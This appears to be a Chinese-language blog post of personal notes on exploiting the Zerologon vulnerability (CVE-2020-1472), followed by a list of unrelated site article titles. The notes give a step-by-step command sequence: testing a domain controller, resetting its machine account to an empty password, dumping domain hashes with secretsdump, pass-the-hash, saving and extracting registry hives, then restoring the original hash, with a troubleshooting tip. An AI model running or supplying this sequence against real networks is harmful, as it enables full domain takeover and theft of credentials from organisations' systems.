主要记下流程 我擦，这个洞mimikatz也可以搞 但是我就不记录了

检验漏洞是否存在

https://github.com/SecuraBV/CVE-2020-1472

先获取域控信息



然后测试能否攻击

python3 zerologon_tester.py DC_NETBIOS_NAME DC_IP_ADDR

将域控的机器账号被重置为空

https://github.com/risksense/zerologon

使用空密码dump域控上的hash

python3 secretsdump.py muxue.com/DC$@10.10.0.129 -no-pass

pth过去

恢复域控机子hash

reg save HKLM\SYSTEM system.save

reg save HKLM\SAM sam.save

reg save HKLM\SECURITY security.save

lget system.save

lget sam.save

lget security.save

del /f system.save

del /f sam.save

del /f security.save

网上很多写的都是get 有可能是因为impacket里的wmiexec更新了 变成了lget

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

然后还原hash

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

查看一下

secretsdump.py domain/administrator:pass@ip -just-dc-user "DC$"



我们可以比对一下上面的图 已经成功修改回来了

记住是双引号 包住机器名 我看别人写的单引号 我这里用单引号不成功

最新文章

1. [系统开发] 一个基于Django和PureCSS的内容管理系统
2. [小北De编程手记] : Lesson 05 玩转 xUnit.Net 之 从Assert谈UT框架实践
3. 【国内独家首发】iPhone4 iOS7不完美越狱教程新鲜出炉
4. NoSuchMethodError: antlr.collections.AST.getLine()I
5. 如何使用bat命令批量删除指定文件名字的符号
6. Codeforces Round #140 (Div. 2)
7. 软件工程 --- Pair Project: Elevator Scheduler [电梯调度算法的实现和测试] [附加题]
8. Python学习_从文件读取数据和保存数据
9. js获取当前url地址及参数
10. [Leetcode][048] Rotate Image 略详细 (Java)
11. BeeswaxException 以及其他问题
12. LeetCode---------Longest Substring Without Repeating Characters解法
13. 对 响应数据写在config文件的再次优化
14. 初学Git命令
15. Android 蓝牙4.0 BLE (onServicesDiscovered 返回 status 是 129，133时)
16. CentOS 7 源码编译MariaDB
17. 如何利用JMeter模拟超过 5 万的并发用户
18. HDU 5745 La Vie en rose 暴力
19. pipelinedb 滑动窗口
20. C#语法基础

热门文章

1. C#调用JAVA（二）调用方法
2. 区分DDD中的Domain, Subdomain, Bounded Context, Problem/Solution Space
3. 第15章: Prometheus监控Kubernetes资源与应用
4. 浅读tomcat架构设计之tomcat生命周期(2)
5. JS中的单例模式及单例模式原型类的实现
6. Nginx：Nginx配置文件详解
7. 【Quartz】Quartz存储与持久化-基于quartz.properties的配置
8. CG-CTF 签到
9. C# 8.0和.NET Core 3.0高级编程 分享笔记三：控制流程和转换类型
10. 深入浅出 Jest 框架的实现原理